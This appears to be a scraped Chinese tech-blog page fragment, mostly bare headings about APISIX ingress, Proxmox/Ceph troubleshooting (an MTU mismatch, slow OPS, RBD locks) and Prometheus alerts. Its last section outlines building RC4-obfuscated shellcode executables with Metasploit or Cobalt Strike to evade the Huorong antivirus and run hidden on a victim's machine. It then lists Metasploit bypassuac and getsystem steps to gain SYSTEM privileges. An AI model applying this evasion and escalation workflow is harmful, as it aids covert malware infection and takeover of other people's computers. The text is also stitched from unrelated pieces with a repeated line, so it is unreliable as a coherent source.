最后二级代理日志有流量进入且正常转发至后端gateway服务，并且返回数据包，能够获取客户端真实IP地址，因为一级代理与二级代理成功携带server_name握手通信，证书链返回正确

Apache APISIX-Ingress无需ETCD结论方案

无ETCD官方博客参考

部署测试

部署应用进行测试连通性

1.自行创建一个nginx服务，过程忽略

2.创建apisix的路由，只能通过yaml文件创建。注意，这不是ingress，是路由规则

3.查看路由规则

4. 访问测试

结论

部署模式优缺点对比

链路架构优缺点对比

Ceph的版本选择-必看！

前言

PVE添加Ceph存储因权限不足导致无法移除磁盘-快照被保护的问题

背景：

解决方法：

解决过程：

总结：

Proxmox VE客户端跨网段挂载Ceph-RBD存储出现got timeout超时问题（畸形报文-数据包不完整）

描述：

背景：

问题：

排查过程：

1. 起初判断是没有放行端口造成的，随后放行了下面端口和协议

2. 放行了端口和协议，还是添加不上RBD，删掉重加也是一直转圈圈。 尝试不做任何限制，全放通还是老样子

3. PVE是7.4版本，不确定是否版本原因。查看了Ceph内核日志、PVE日志，都没发现有其它的报错。尝试降低版本为7.2

4. 降低版本还是一样。。然后去pve执行命令会hang住，telnet端口却是通的，只要添加了RBD存储，日志就会提示：状态更新超时，如下图：

5. 然后查看ceph的配置是否有网段限制，配置也是全网段放通的，发现并没有网络限制。

6. 最后找不到问题，抓包分析数据包情况。分析结果为：畸形报文，标志位为RST重置了链接

7. 疑问：为什么会有畸形报文？什么情况会重置连接？

8. 然后路由追踪多少个跳点，判断经过多少个交换机

9. 中间跳了4次，经过沟通得知中间经历了路由器和交换机。那么问题出现在哪？经过上面的畸形报文分析，有可能是数据包大小不一致

10.为了增强吞吐量，底层存储和PVE都是用的MTU为9000，然而这里的PVE中间经历了NSX转发、路由器和交换机，中间的交换机或路由器没有统一设置MTU为9000，所以导致了报文畸形

11. PVE把MTU改成1500，然后恢复正常

结论：

解决方案：

Ceph节点故障触发重平衡，导致IO堆积，大量SLOW OPS卡死OSD，引起虚拟机无法写入

Ceph节点故障触发重平衡，导致IO堆积，大量SLOW OPS卡死OSD，引起虚拟机无法写入解决方法

查看集群状态发现慢请求的osd告警：

osd日志发现：

相关慢ops的案例：

还有osd有逻辑坏道也会导致slow ops，延迟会非常高，虽然说不会有致命威胁，但会严重拉低性能。以下是逻辑坏道的警告信息：

下图是op的全流程和时间：

官方新版弃用了缓存层，不稳定有缺陷：

解决办法：

Ceph-RBD锁引起KVM无法开机问题(RBD块设备无法映射)

前言

排查过程

ceph rbd的新特性

解决方案

Prometheus监控-Ceph告警规则到飞书群组（全网最全最详细）

Prometheus监控-Ceph告警规则（全网最全最详细）

随便把监控规则调低测试告警信息

shellcode混淆rc4加密生成exe免杀火绒

MSF生成C语言的payload或者使用cobalt strike生成也是一样的

Cobalt Strike生成方法

MSF生成方法

打开Visual Stuido编辑代码，复制payload进去

使用debug模式在线运行，弹出cmd窗口后，复制最下面那段加密过的payload

切换成Release生成解决方案

MSF开启监听，等待有缘人执行程序上线

执行exe无弹窗无感知，隐藏在后台运行

后渗透常用命令

后渗透提权

2. 放行了端口和协议，还是添加不上RBD，删掉重加也是一直转圈圈。尝试不做任何限制，全放通还是老样子

1、查看可用模块 MSF终端中输入 search bypassuac 查看提权模块

2、选择一个适合当前系统的提权模块我这边使用的是win10系统

3 配置模块使用参数终端内输入

5 获取到meterpreter后我们在终端内输入getuid 看实际还没有提权成功需要在还终端内在输入 getsystem 获取权限

6 获取权限完成后输入getuid 即可看到已经获取到SYSTEM 最高权限了